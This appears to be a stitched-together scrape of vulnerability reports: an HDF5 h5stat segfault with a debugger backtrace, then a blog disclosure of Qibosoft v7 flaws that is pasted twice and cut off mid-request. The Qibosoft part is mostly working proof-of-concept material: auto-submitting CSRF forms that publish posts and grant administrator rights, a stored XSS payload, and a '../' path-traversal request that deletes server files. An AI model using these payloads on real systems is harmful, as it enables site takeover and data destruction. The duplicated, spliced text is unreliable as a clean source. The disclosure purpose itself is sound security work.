HDF5 1.13.1-1 is affected by: segmentation fault, which causes a Denial of Service.

**Version:**

**System information**

    Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)
    

**command:**

POC8.zip

**result**

**ASAN information**

    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    __GI___libc_free (mem=0x61626c6c6163206c) at malloc.c:3102
    3102  malloc.c: No such file or directory.
    gdb-peda$ bt
    #0  __GI___libc_free (mem=0x61626c6c6163206c) at malloc.c:3102
    #1  0x000055555566ff52 in H5MM_xfree (mem=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5MM.c:557
    #2  0x0000555555693fb1 in H5O__link_reset (_mesg=0x55555594d4b0) at /home/zxq/CVE_testing/source/hdf5/src/H5Olink.c:564
    #3  0x0000555555695d8d in H5O__msg_reset_real (type=<optimized out>, type=<optimized out>, native=<optimized out>)
        at /home/zxq/CVE_testing/source/hdf5/src/H5Omessage.c:589
    #4  H5O_msg_reset (type_id=type_id@entry=0x6, native=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5Omessage.c:556
    #5  0x0000555555631d78 in H5G__link_release_table (ltable=ltable@entry=0x7fffffffd990) at /home/zxq/CVE_testing/source/hdf5/src/H5Glink.c:517
    #6  0x0000555555802355 in H5G__compact_iterate (oloc=oloc@entry=0x55555594d3d8, linfo=<optimized out>, idx_type=idx_type@entry=H5_INDEX_NAME, 
        order=order@entry=H5_ITER_INC, skip=skip@entry=0x0, last_lnk=last_lnk@entry=0x0, op=0x55555562f110 <H5G__visit_cb>, op_data=0x7fffffffdb30)
        at /home/zxq/CVE_testing/source/hdf5/src/H5Gcompact.c:412
    #7  0x000055555563887f in H5G__obj_iterate (grp_oloc=grp_oloc@entry=0x55555594d3d8, idx_type=H5_INDEX_NAME, order=order@entry=H5_ITER_INC, 
        skip=skip@entry=0x0, last_lnk=last_lnk@entry=0x0, op=op@entry=0x55555562f110 <H5G__visit_cb>, op_data=0x7fffffffdb30)
        at /home/zxq/CVE_testing/source/hdf5/src/H5Gobj.c:661
    #8  0x0000555555630b64 in H5G_visit (loc=loc@entry=0x7fffffffdbc0, group_name=<optimized out>, idx_type=<optimized out>, order=H5_ITER_INC, 
        op=<optimized out>, op_data=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5Gint.c:1243
    #9  0x00005555557ae1f5 in H5VL__native_link_specific (obj=<optimized out>, loc_params=0x7fffffffdc40, args=0x7fffffffdc70, dxpl_id=<optimized out>, 
        req=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5VLnative_link.c:374
    #10 0x000055555579d200 in H5VL__link_specific (cls=<optimized out>, req=0x0, dxpl_id=0xb00000000000008, args=0x7fffffffdc70, loc_params=0x7fffffffdc40, 
        obj=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5VLcallback.c:5305
    #11 H5VL_link_specific (vol_obj=vol_obj@entry=0x55555594b890, loc_params=loc_params@entry=0x7fffffffdc40, args=args@entry=0x7fffffffdc70, 
        dxpl_id=0xb00000000000008, req=req@entry=0x0) at /home/zxq/CVE_testing/source/hdf5/src/H5VLcallback.c:5339
    #12 0x0000555555664b41 in H5Lvisit_by_name2 (loc_id=loc_id@entry=0x100000000000000, group_name=group_name@entry=0x5555558166e4 "/", 
        idx_type=H5_INDEX_NAME, order=H5_ITER_INC, op=op@entry=0x55555557eda0 <traverse_cb>, op_data=op_data@entry=0x7fffffffdd40, lapl_id=<optimized out>)
        at /home/zxq/CVE_testing/source/hdf5/src/H5L.c:1984
    #13 0x000055555558040e in traverse (fields=0x1f, visitor=0x7fffffffdd00, recurse=0x1, visit_start=<optimized out>, grp_name=0x5555558166e4 "/", 
        file_id=0x100000000000000) at /home/zxq/CVE_testing/source/hdf5/tools/lib/h5trav.c:288
    #14 h5trav_visit (fid=0x100000000000000, grp_name=0x5555558166e4 "/", visit_start=<optimized out>, recurse=<optimized out>, visit_obj=<optimized out>, 
        visit_lnk=<optimized out>, udata=0x7fffffffde80, fields=0x1f) at /home/zxq/CVE_testing/source/hdf5/tools/lib/h5trav.c:1057
    #15 0x0000555555563727 in main (argc=argc@entry=0x2, argv=argv@entry=0x7fffffffe308) at /home/zxq/CVE_testing/source/hdf5/tools/src/h5stat/h5stat.c:1795
    #16 0x00007ffff7c930b3 in __libc_start_main (main=0x555555562f20 <main>, argc=0x2, argv=0x7fffffffe308, init=<optimized out>, fini=<optimized out>, 
        rtld_fini=<optimized out>, stack_end=0x7fffffffe2f8) at ../csu/libc-start.c:308
    #17 0x0000555555563a3e in _start ()

CVE-2021-45829: segmentation fault in h5stat · Issue #1317 · HDFGroup/hdf5

An issue in /admin/index.php?lfj=mysql&action=del of Qibosoft v7 allows attackers to arbitrarily delete files.

**Foreword**

The csrf vulnerabilities exists almost everywhere in the application. Due to a number of background vulnerabilities, just with a few tricks, an attacker can take over the application. Next, I’ll show you a few problems caused by CSRF combined with other background vulnerabilities.  
if you want to reproduce these vuls , please go to qisoft and download “齐博CMS整站系统v7”

**0x01 CSRF in publishing articles**

position: /member/post.php?job=postnew&step=post

a normal http request like this:

    POST /qibo7/member/post.php?job=postnew&step=post HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1005
    Connection: close
    Referer: http://localhost:8123/qibo7/member/post.php?job=postnew&only=1&mid=0
    Cookie: USR=faol4ey2%091%091571797336%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fdo%2Fupfile.php%3Ffn%3Duppic%26dir%3Darticle%2F%26ISone%3D1; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201571799136084%7D; __51cke__=; __51laig__=42; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774
    Upgrade-Insecure-Requests: 1
    
    fid=4&postdb%5Btitle%5D=ceshi2&postdb%5Btitlecolor%5D=ceshi&postdb%5Bfonttype%5D=1&postdb%5Bforbidcomment%5D=1&postdb%5Bkeywords%5D=ceshi&select2=&postdb%5Bauthor%5D=&postdb%5Bcopyfrom%5D=&select=&postdb%5Bcopyfromurl%5D=&postdb%5Bpicurl%5D=&postdb%5Bautomakesmall%5D=1&picWidth=300&picHeight=225&postdb%5Bdescription%5D=&postdb%5Byz%5D=1&PageNum=3000&postdb%5Bcontent%5D=1233333323%3Cbr+%2F%3E%0D%0A&Submit=+%E6%8F%90+%E4%BA%A4+&postdb%5Bbak_id%5D=&mid=0&i_id=&aid=0&rid=&only=1&postdb%5Bsmalltitle%5D=&postdb%5Bhtmlname%5D=&postdb%5Btpl%5D%5Bhead%5D=&postdb%5Btpl%5D%5Bfoot%5D=&postdb%5Btpl%5D%5Bbencandy%5D=&postdb%5Bstyle%5D=&postdb%5Bposttime%5D=&postdb%5Bbegintime%5D=&postdb%5Bendtime%5D=&postdb%5Bhits%5D=&postdb%5Bpasswd%5D=&postdb%5Bmoney%5D=&postdb%5Bsubhead%5D=&vote_db%5Bname%5D=&vote_db%5Btype%5D=1&vote_db%5Blimittime%5D=&vote_db%5Blimitip%5D=0&vote_db%5Bforbidguestvote%5D=0&vote_db%5Bbegintime%5D=&vote_db%5Bendtime%5D=&vote_db%5Babout%5D=&vote_db%5Bvotetype%5D=0&textfield=1&hiddenField=0
    

from the request, we can find that there is not a csrf token, besides, the app does not check the referer.Then, we can generate a csrf poc like the one below by burpsuite:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form id="csrf" action="http://localhost:8123/qibo7/member/post.php?job=postnew&step=post" method="POST">
          <input type="hidden" name="fid" value="4" />
          <input type="hidden" name="postdb&#91;title&#93;" value="you have been hacked" />
          <input type="hidden" name="postdb&#91;titlecolor&#93;" value="ceshi" />
          <input type="hidden" name="postdb&#91;fonttype&#93;" value="1" />
          <input type="hidden" name="postdb&#91;forbidcomment&#93;" value="1" />
          <input type="hidden" name="postdb&#91;keywords&#93;" value="ceshi" />
          <input type="hidden" name="select2" value="" />
          <input type="hidden" name="postdb&#91;author&#93;" value="" />
          <input type="hidden" name="postdb&#91;copyfrom&#93;" value="" />
          <input type="hidden" name="select" value="" />
          <input type="hidden" name="postdb&#91;copyfromurl&#93;" value="" />
          <input type="hidden" name="postdb&#91;picurl&#93;" value="" />
          <input type="hidden" name="postdb&#91;automakesmall&#93;" value="1" />
          <input type="hidden" name="picWidth" value="300" />
          <input type="hidden" name="picHeight" value="225" />
          <input type="hidden" name="postdb&#91;description&#93;" value="" />
          <input type="hidden" name="postdb&#91;yz&#93;" value="1" />
          <input type="hidden" name="PageNum" value="3000" />
          <input type="hidden" name="postdb&#91;content&#93;" value="1233333323&lt;br&#32;&#47;&gt;&#13;&#10;" />
          <input type="hidden" name="Submit" value="&#32;æ&#143;&#144;&#32;äº&#164;&#32;" />
          <input type="hidden" name="postdb&#91;bak&#95;id&#93;" value="" />
          <input type="hidden" name="mid" value="0" />
          <input type="hidden" name="i&#95;id" value="" />
          <input type="hidden" name="aid" value="0" />
          <input type="hidden" name="rid" value="" />
          <input type="hidden" name="only" value="1" />
          <input type="hidden" name="postdb&#91;smalltitle&#93;" value="" />
          <input type="hidden" name="postdb&#91;htmlname&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;head&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;foot&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;bencandy&#93;" value="" />
          <input type="hidden" name="postdb&#91;style&#93;" value="" />
          <input type="hidden" name="postdb&#91;posttime&#93;" value="" />
          <input type="hidden" name="postdb&#91;begintime&#93;" value="" />
          <input type="hidden" name="postdb&#91;endtime&#93;" value="" />
          <input type="hidden" name="postdb&#91;hits&#93;" value="" />
          <input type="hidden" name="postdb&#91;passwd&#93;" value="" />
          <input type="hidden" name="postdb&#91;money&#93;" value="" />
          <input type="hidden" name="postdb&#91;subhead&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;name&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;type&#93;" value="1" />
          <input type="hidden" name="vote&#95;db&#91;limittime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;limitip&#93;" value="0" />
          <input type="hidden" name="vote&#95;db&#91;forbidguestvote&#93;" value="0" />
          <input type="hidden" name="vote&#95;db&#91;begintime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;endtime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;about&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;votetype&#93;" value="0" />
          <input type="hidden" name="textfield" value="1" />
          <input type="hidden" name="hiddenField" value="0" />
        </form>
        <script>
            var poc = document.getElementById("csrf");
            poc.submit()
        </script>
      </body>
    </html>
    
    

attacker just need to save the poc as a html and put it on his web server, then send the evil url to another users ,If the user clicks the evil url when logged into the system, he will publish an article(and the article title is defind in the poc) without his knowledge.Now, I will show you the details. I login admin account locally:

and I try to request the evil url(http://localhost/test/csrf\_poc1.php), then when we back to the index.php we will find that one more article is published with title “you have been hacked”!

**0x02 CSRF to Privilege Escalation (add an super administrator)**

position: /admin/index.php?lfj=member&action=editmember

normal request(change user “axin” to administrator):

    POST /qibo7/admin/index.php?lfj=member&action=editmember HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 633
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=member&job=editmember&uid=2
    Cookie: USR=faol4ey2%096%091571798905%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fdo%2Fregfield.php%3Fjob%3Dreg%26uid%3D2%260.20012388446694007; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201571799269555%7D; __51cke__=; __51laig__=43; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=CDtWAVhaCDkAVQwCWgdXB1ZQWAdUB1BQVFVZA1cOAlVbCg9XVlVfCQ%3D%3D8991c7cf95
    Upgrade-Insecure-Requests: 1
    
    postdb%5Busername%5D=axin&postdb%5Bpassword%5D=5f4dcc3b5aa765d61d8327deb882cf99&postdb%5Bnewpassword%5D=&postdb%5Bgroupid%5D=3&ConfigDB%5Bendtime%5D=&postdb%5Bemail%5D=770284144%40qq.com&postdb%5Bicon%5D=&picWidth=150&picHeight=150&postdb%5Bmoney%5D=5&postdb%5Btotalspace%5D=0&postdb%5Boltime%5D=13226&postdb%5Bsex%5D=0&postdb%5Byz%5D=1&postdb%5Bintroduce%5D=&postdb%5Boicq%5D=&postdb%5Bmsn%5D=&postdb%5Bhomepage%5D=&postdb%5Baddress%5D=&postdb%5Bpostalcode%5D=&postdb%5Btelephone%5D=&postdb%5Bmobphone%5D=&postdb%5Bidcard%5D=&postdb%5Btruename%5D=&email_yz=0&mob_yz=0&idcard_yz=0&Submit=%E4%BF%AE+%E6%94%B9&uid=2&postdb%5Bhits%5D2=2
    

then, we can generate a csrf poc by burpsuite:

    <html>
    
    <body>
    <script>history.pushState('', '', '/')</script>
    <form id="csrf" action="http://localhost:8123/qibo7/admin/index.php?lfj=member&action=editmember" method="POST">
        <input type="hidden" name="postdb&#91;username&#93;" value="axin" />
        <input type="hidden" name="postdb&#91;password&#93;" value="5f4dcc3b5aa765d61d8327deb882cf99" />
        <input type="hidden" name="postdb&#91;newpassword&#93;" value="" />
        <input type="hidden" name="postdb&#91;groupid&#93;" value="3" />
        <input type="hidden" name="ConfigDB&#91;endtime&#93;" value="" />
        <input type="hidden" name="postdb&#91;email&#93;" value="770284144&#64;qq&#46;com" />
        <input type="hidden" name="postdb&#91;icon&#93;" value="" />
        <input type="hidden" name="picWidth" value="150" />
        <input type="hidden" name="picHeight" value="150" />
        <input type="hidden" name="postdb&#91;money&#93;" value="5" />
        <input type="hidden" name="postdb&#91;totalspace&#93;" value="0" />
        <input type="hidden" name="postdb&#91;oltime&#93;" value="13226" />
        <input type="hidden" name="postdb&#91;sex&#93;" value="0" />
        <input type="hidden" name="postdb&#91;yz&#93;" value="1" />
        <input type="hidden" name="postdb&#91;introduce&#93;" value="" />
        <input type="hidden" name="postdb&#91;oicq&#93;" value="" />
        <input type="hidden" name="postdb&#91;msn&#93;" value="" />
        <input type="hidden" name="postdb&#91;homepage&#93;" value="" />
        <input type="hidden" name="postdb&#91;address&#93;" value="" />
        <input type="hidden" name="postdb&#91;postalcode&#93;" value="" />
        <input type="hidden" name="postdb&#91;telephone&#93;" value="" />
        <input type="hidden" name="postdb&#91;mobphone&#93;" value="" />
        <input type="hidden" name="postdb&#91;idcard&#93;" value="" />
        <input type="hidden" name="postdb&#91;truename&#93;" value="" />
        <input type="hidden" name="email&#95;yz" value="0" />
        <input type="hidden" name="mob&#95;yz" value="0" />
        <input type="hidden" name="idcard&#95;yz" value="0" />
        <input type="hidden" name="Submit" value="ä&#191;&#174;&#32;æ&#148;&#185;" />
        <input type="hidden" name="uid" value="2" />
        <input type="hidden" name="postdb&#91;hits&#93;2" value="2" />
        <input type="submit" value="Submit request" />
    </form>
    <script>
        var poc = document.getElementById("csrf");
        poc.submit()
    </script>
    </body>
    </html>
    

the poc is to change user “axin” to administrator, if you want to reproduce the attack, you should register a common user first, and then generate csrf poc yourself.

from the picture below , we can see that the user axin is just a common user.  

but after the admin click the evil url, the user axin will be admin !!

**0x03 Stored XSS in background**

position:/admin/index.php?lfj=friendlink&action=add  
request:

    POST /qibo7/admin/index.php?lfj=friendlink&action=add HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 283
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=friendlink&job=add
    Cookie: USR=faol4ey2%091%091571805064%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fadmin%2Findex.php%3Flfj%3Dfriendlink%26job%3Dadd; __tins__20133593=%7B%22sid%22%3A%201571802713278%2C%20%22vd%22%3A%204%2C%20%22expires%22%3A%201571805446751%7D; __51cke__=; __51laig__=47; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=CDtWAVhaCDkAVQwCWgdXB1ZQWAdUB1BQVFVZA1cOAlVbCg9XVlVfCQ%3D%3D8991c7cf95
    Upgrade-Insecure-Requests: 1
    
    postdb%5Bname%5D=axin&postdb%5Bfid%5D=2&postdb%5Burl%5D=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&postdb%5Blogo%5D=&postdb%5Bdescrip%5D=&postdb%5Bifhide%5D=0&postdb%5Byz%5D=1&postdb%5Biswordlink%5D=0&postdb%5Bendtime%5D=&Submit=%E6%8F%90%E4%BA%A4%E6%95%B0%E6%8D%AE&id=
    

No dangerous characters are escaped， so we can insert our payload like below:  
"><script>alert(1);</script>  

  
  
of course, we can also combine the xss with the csrf to do more !

**0x04 Arbitrary File Deletion in background**

position:/admin/index.php?lfj=mysql&action=del

poc:

    POST /qibo7/admin/index.php?lfj=mysql&action=del HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 63
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=mysql&job=del
    Cookie: USR=faol4ey2%091%091571799626%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fadmin%2Findex.php%3Flfj%3Dmysql%26job%3Ddel; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201571799269555%7D; __51cke__=; __51laig__=43; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Admin=2%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=V29XS10LbVNSA1EBBgNVBwBXUQQNXQEBVF4GBVNcUlZdXgRQUlxd14a26ee802
    Upgrade-Insecure-Requests: 1
    
    baktime=../test.php&Submit=%E5%88%A0%E9%99%A4%E6%95%B0%E6%8D%AE
    

The problem occurred when the backup database was deleted， we can control the parameter “baktime”, and we can use ../ to achieve directory traversal purpose, so we can delete some web pages.I will show you details next.

firstly, create a file named axin.php in the root path of the application like below

and then send our payload

now, the file axin.php created just now has been deleted!

of course, we can also combine the vul with csrf to do more !

CVE-2020-20944: some vulnerabilities in qibosoft(齐博CMS整站系统v7)_tnt阿信的博客-CSDN博客

Qibosoft v7 contains a stored cross-site scripting (XSS) vulnerability in the component /admin/index.php?lfj=friendlink&action=add.

![](https://img-blog.csdnimg.cn/20200708203502702.gif#pic_center)

**Foreword**

The csrf vulnerabilities exists almost everywhere in the application. Due to a number of background vulnerabilities, just with a few tricks, an attacker can take over the application. Next, I’ll show you a few problems caused by CSRF combined with other background vulnerabilities.  
if you want to reproduce these vuls , please go to qisoft and download “齐博CMS整站系统v7”

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023130316593.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

**0x01 CSRF in publishing articles**

position: /member/post.php?job=postnew&step=post

a normal http request like this:

    POST /qibo7/member/post.php?job=postnew&step=post HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1005
    Connection: close
    Referer: http://localhost:8123/qibo7/member/post.php?job=postnew&only=1&mid=0
    Cookie: USR=faol4ey2%091%091571797336%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fdo%2Fupfile.php%3Ffn%3Duppic%26dir%3Darticle%2F%26ISone%3D1; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201571799136084%7D; __51cke__=; __51laig__=42; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774
    Upgrade-Insecure-Requests: 1
    
    fid=4&postdb%5Btitle%5D=ceshi2&postdb%5Btitlecolor%5D=ceshi&postdb%5Bfonttype%5D=1&postdb%5Bforbidcomment%5D=1&postdb%5Bkeywords%5D=ceshi&select2=&postdb%5Bauthor%5D=&postdb%5Bcopyfrom%5D=&select=&postdb%5Bcopyfromurl%5D=&postdb%5Bpicurl%5D=&postdb%5Bautomakesmall%5D=1&picWidth=300&picHeight=225&postdb%5Bdescription%5D=&postdb%5Byz%5D=1&PageNum=3000&postdb%5Bcontent%5D=1233333323%3Cbr+%2F%3E%0D%0A&Submit=+%E6%8F%90+%E4%BA%A4+&postdb%5Bbak_id%5D=&mid=0&i_id=&aid=0&rid=&only=1&postdb%5Bsmalltitle%5D=&postdb%5Bhtmlname%5D=&postdb%5Btpl%5D%5Bhead%5D=&postdb%5Btpl%5D%5Bfoot%5D=&postdb%5Btpl%5D%5Bbencandy%5D=&postdb%5Bstyle%5D=&postdb%5Bposttime%5D=&postdb%5Bbegintime%5D=&postdb%5Bendtime%5D=&postdb%5Bhits%5D=&postdb%5Bpasswd%5D=&postdb%5Bmoney%5D=&postdb%5Bsubhead%5D=&vote_db%5Bname%5D=&vote_db%5Btype%5D=1&vote_db%5Blimittime%5D=&vote_db%5Blimitip%5D=0&vote_db%5Bforbidguestvote%5D=0&vote_db%5Bbegintime%5D=&vote_db%5Bendtime%5D=&vote_db%5Babout%5D=&vote_db%5Bvotetype%5D=0&textfield=1&hiddenField=0
    

from the request, we can find that there is not a csrf token, besides, the app does not check the referer.Then, we can generate a csrf poc like the one below by burpsuite:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form id="csrf" action="http://localhost:8123/qibo7/member/post.php?job=postnew&step=post" method="POST">
          <input type="hidden" name="fid" value="4" />
          <input type="hidden" name="postdb&#91;title&#93;" value="you have been hacked" />
          <input type="hidden" name="postdb&#91;titlecolor&#93;" value="ceshi" />
          <input type="hidden" name="postdb&#91;fonttype&#93;" value="1" />
          <input type="hidden" name="postdb&#91;forbidcomment&#93;" value="1" />
          <input type="hidden" name="postdb&#91;keywords&#93;" value="ceshi" />
          <input type="hidden" name="select2" value="" />
          <input type="hidden" name="postdb&#91;author&#93;" value="" />
          <input type="hidden" name="postdb&#91;copyfrom&#93;" value="" />
          <input type="hidden" name="select" value="" />
          <input type="hidden" name="postdb&#91;copyfromurl&#93;" value="" />
          <input type="hidden" name="postdb&#91;picurl&#93;" value="" />
          <input type="hidden" name="postdb&#91;automakesmall&#93;" value="1" />
          <input type="hidden" name="picWidth" value="300" />
          <input type="hidden" name="picHeight" value="225" />
          <input type="hidden" name="postdb&#91;description&#93;" value="" />
          <input type="hidden" name="postdb&#91;yz&#93;" value="1" />
          <input type="hidden" name="PageNum" value="3000" />
          <input type="hidden" name="postdb&#91;content&#93;" value="1233333323&lt;br&#32;&#47;&gt;&#13;&#10;" />
          <input type="hidden" name="Submit" value="&#32;æ&#143;&#144;&#32;äº&#164;&#32;" />
          <input type="hidden" name="postdb&#91;bak&#95;id&#93;" value="" />
          <input type="hidden" name="mid" value="0" />
          <input type="hidden" name="i&#95;id" value="" />
          <input type="hidden" name="aid" value="0" />
          <input type="hidden" name="rid" value="" />
          <input type="hidden" name="only" value="1" />
          <input type="hidden" name="postdb&#91;smalltitle&#93;" value="" />
          <input type="hidden" name="postdb&#91;htmlname&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;head&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;foot&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;bencandy&#93;" value="" />
          <input type="hidden" name="postdb&#91;style&#93;" value="" />
          <input type="hidden" name="postdb&#91;posttime&#93;" value="" />
          <input type="hidden" name="postdb&#91;begintime&#93;" value="" />
          <input type="hidden" name="postdb&#91;endtime&#93;" value="" />
          <input type="hidden" name="postdb&#91;hits&#93;" value="" />
          <input type="hidden" name="postdb&#91;passwd&#93;" value="" />
          <input type="hidden" name="postdb&#91;money&#93;" value="" />
          <input type="hidden" name="postdb&#91;subhead&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;name&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;type&#93;" value="1" />
          <input type="hidden" name="vote&#95;db&#91;limittime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;limitip&#93;" value="0" />
          <input type="hidden" name="vote&#95;db&#91;forbidguestvote&#93;" value="0" />
          <input type="hidden" name="vote&#95;db&#91;begintime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;endtime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;about&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;votetype&#93;" value="0" />
          <input type="hidden" name="textfield" value="1" />
          <input type="hidden" name="hiddenField" value="0" />
        </form>
        <script>
            var poc = document.getElementById("csrf");
            poc.submit()
        </script>
      </body>
    </html>
    
    

attacker just need to save the poc as a html and put it on his web server, then send the evil url to another users ,If the user clicks the evil url when logged into the system, he will publish an article(and the article title is defind in the poc) without his knowledge.Now, I will show you the details. I login admin account locally:

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023120247906.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

and I try to request the evil url(http://localhost/test/csrf\_poc1.php), then when we back to the index.php we will find that one more article is published with title “you have been hacked”!

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023120926730.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

**0x02 CSRF to Privilege Escalation (add an super administrator)**

position: /admin/index.php?lfj=member&action=editmember

normal request(change user “axin” to administrator):

    POST /qibo7/admin/index.php?lfj=member&action=editmember HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 633
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=member&job=editmember&uid=2
